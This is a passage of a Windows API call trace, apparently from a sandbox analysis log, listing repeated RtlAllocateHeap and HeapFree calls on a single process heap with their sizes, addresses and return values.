HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b44498 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.873] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.873] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b44498 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.874] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.874] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b44498 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.875] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.875] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b44498 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.876] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b44498 [0165.876] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.877] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.877] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b44498 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b44498 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.878] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.878] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.879] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.879] RtlAllocateHeap 